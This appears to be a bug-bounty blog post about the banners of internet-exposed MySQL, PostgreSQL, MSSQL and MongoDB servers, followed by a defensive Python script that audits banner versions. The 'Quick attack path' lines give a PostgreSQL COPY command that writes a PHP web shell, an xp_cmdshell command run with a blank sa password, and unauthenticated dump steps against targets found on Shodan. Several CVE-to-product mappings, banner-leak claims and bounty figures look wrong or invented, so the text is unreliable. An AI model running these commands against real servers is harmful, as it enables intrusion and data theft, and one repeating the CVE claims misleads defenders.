When a database server is accidentally exposed to the internet (port open without firewall, NAT misconfiguration, cloud security group too permissive), the very first thing an attacker sees is the banner, the greeting string the service sends right after connection.
In 2025–2026, these banners are still the fastest path to compromise because:
a) they usually contain exact software name + version
b) version → known CVE lookup → exploit in minutes
c) many older versions have unauthenticated RCE, auth bypass, or full DB dump vulnerabilities
Here are the most common banners you’ll see on exposed MySQL, PostgreSQL, Microsoft SQL Server (MSSQL), and MongoDB instances, together with why each one is dangerous and what bounty hunters / attackers look for.
MySQL / MariaDB (port 3306)
Typical banners (real captures)
5.7.44-0ubuntu0.22.04.1-log
8.0.36-0ubuntu0.22.04.1
10.6.18-MariaDB-0ubuntu0.22.04.1
5.5.68-MariaDB
Danger levels & bounties
a) 5.5.x / 5.6.x / 5.7.x before ~5.7.44 → CVE-2021-27928, CVE-2022-1292, older UDF code execution → $8k–$30k bounties
b) MariaDB 10.3.x–10.5.x → several unauthenticated RCEs and auth bypasses → $10k–$35k
c) No password on root / trust auth → banner shows “root@hostname” → instant DB dump → $5k–$25k
d) Exposed INFORMATION_SCHEMA → full schema leak → pivot to internal apps
Quick attack path: mysql -h target.com -u root (no password) → dump users/hashes → escalate.
PostgreSQL (port 5432)
Typical banners
PostgreSQL 12.4 on x86_64-pc-linux-gnu, compiled by gcc (GCC) 10.2.1 20210110, 64-bit
PostgreSQL 15.3, server encoding UTF8
PostgreSQL 9.6.24
Danger levels & bounties
a) 9.x / 10.x / 11.x → CVE-2020-14349 COPY FROM PROGRAM RCE, older auth bypasses → $10k–$40k
b) Trust auth in pg_hba.conf → banner often leaks “trust” mode → instant login → $8k–$35k
c) Superuser with no password → full DB + OS command execution via COPY / language handlers → $15k–$50k
d) Exposed default database “postgres” → often no auth → schema dump → internal recon
Quick attack path: psql -h target.com -U postgres → if trust/no password → COPY (SELECT '<?php system($_GET[cmd]); ?>') TO '/var/www/html/shell.php';
Microsoft SQL Server (MSSQL) (port 1433)
Typical banners
Microsoft SQL Server 2019 (RTM) - 15.0.2000.5
Microsoft SQL Server 2017 (RTM-CU31) - 14.0.3456.2
Microsoft SQL Server 2016 (SP3) - 13.0.6300.2
Danger levels & bounties
a) 2014 / 2016 / 2017 before latest CU → CVE-2020-0618 xp_cmdshell RCE, older pre-auth bugs → $10k–$45k
b) SA account with blank/weak password → banner often leaks server name → sqlcmd -S target.com -U sa -P "" → xp_cmdshell → full RCE → $15k–$50k
c) Linked server abuse → pivot to other internal SQL instances
Quick attack path: sqlcmd -S target.com -U sa -P "" -Q "EXEC xp_cmdshell 'whoami'" → instant shell if SA is open.
MongoDB (port 27017)
Typical banners
MongoDB Server 4.4.29
MongoDB Server 5.0.24
MongoDB Server 6.0.14
Danger levels & bounties
a) 3.x / 4.x without auth → full DB dump (users, PII, credentials) → $5k–$25k
b) No bindIp restriction → banner leaks version → CVE-2019-10758 / CVE-2020-2460 RCE → $10k–$40k
c) JavaScript injection via $where (older versions) → full RCE
Quick attack path: mongo target.com:27017 → if no auth → db.getCollectionNames() → dump everything.
A few practical steps for discovering and reporting exposed databases:
1. Use Shodan, Censys, or ZoomEye to find exposed databases by running the following four port queries:
Ports: 3306, 5432, 1433, 27017
2. To analyse a banner for a known CVE (and a possible bounty), take the version number from it and search the NVD (nvd.nist.gov) or Exploit-DB (exploit-db.com) for an unauthenticated RCE or database dump affecting that version. If you find one, report it immediately. (Where an unauthenticated RCE exists, private programs generally pay $5K–$50K and up.)
3. When you have a proof of concept, do not run any destructive payloads. Show only the banner, the version number, and proof that no authentication is needed (e.g. mysql -h target.com -u root connects without a password).
Exposed database ports with default/weak auth remain some of the highest-paying bug bounty finds because the impact is almost always “critical”: full data exfil, RCE, internal pivot. Grab nmap or netcat and scan your own perimeter once a month: you might find something that pays very well, or worse, something that is already being exploited.
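As an added example (not code from the original post), here is a small Python self-audit that parses banners in the four formats listed above into a product and version tuple and flags any instance that is below a version floor, the kind of check to run over the output of your monthly perimeter scan. The hostnames and banner records are constructed, and the floors in MIN_VERSION are an assumption taken from the branches this page calls out, not a vendor support list.

```python
import re
# Version floors derived from the branches this page flags as dangerous. They are an
# assumption for this demo: replace them with your vendor's current supported-release list.
MIN_VERSION = {"mariadb": (10, 6, 0), "mysql": (5, 7, 44), "postgresql": (12, 0),
               "mssql": (2019,), "mongodb": (5, 0, 0)}

# Banner patterns in the formats listed above. MariaDB is tried before MySQL because
# its banner also starts with a bare x.y.z version.
PATTERNS = [
    ("mariadb", re.compile(r"^(\d+\.\d+\.\d+)-MariaDB")),
    ("mysql", re.compile(r"^(\d+\.\d+\.\d+)")),
    ("postgresql", re.compile(r"^PostgreSQL (\d+(?:\.\d+)*)")),
    ("mssql", re.compile(r"^Microsoft SQL Server (\d{4})")),
    ("mongodb", re.compile(r"^MongoDB Server (\d+\.\d+\.\d+)")),
]

def parse_banner(banner):
    """Return (product, version tuple), or None if the banner is not recognised."""
    for product, pattern in PATTERNS:
        m = pattern.match(banner.strip())
        if m:
            return product, tuple(int(x) for x in m.group(1).split("."))
    return None

def audit(records):
    """Audit (host, port, banner) triples; return (host, port, issue) for each unrecognised or below-floor banner."""
    findings = []
    for host, port, banner in records:
        parsed = parse_banner(banner)
        if parsed is None:
            findings.append((host, port, "unrecognised banner, inspect manually"))
            continue
        product, version = parsed
        if version < MIN_VERSION[product]:  # tuple compare handles 2- to 4-part versions
            dotted = [".".join(map(str, v)) for v in (version, MIN_VERSION[product])]
            findings.append((host, port, f"{product} {dotted[0]} is below floor {dotted[1]}"))
    return findings

# Constructed sample scan output in the banner formats listed above (hostnames are placeholders).
SAMPLE = [
    ("db1.internal.example", 3306, "5.7.44-0ubuntu0.22.04.1-log"),
    ("db2.internal.example", 3306, "5.5.68-MariaDB"),
    ("pg1.internal.example", 5432, "PostgreSQL 9.6.24"),
    ("sql1.internal.example", 1433, "Microsoft SQL Server 2017 (RTM-CU31) - 14.0.3456.2"),
    ("mongo1.internal.example", 27017, "MongoDB Server 4.4.29"),
]

if __name__ == "__main__":
    for host, port, issue in audit(SAMPLE):
        print(f"{host}:{port}  {issue}")
```

Feed it the banners your own scanner collected; anything it reports as unrecognised is worth a manual look, since an unexpected greeting on a database port is often a proxy, honeypot, or a product you did not know was there.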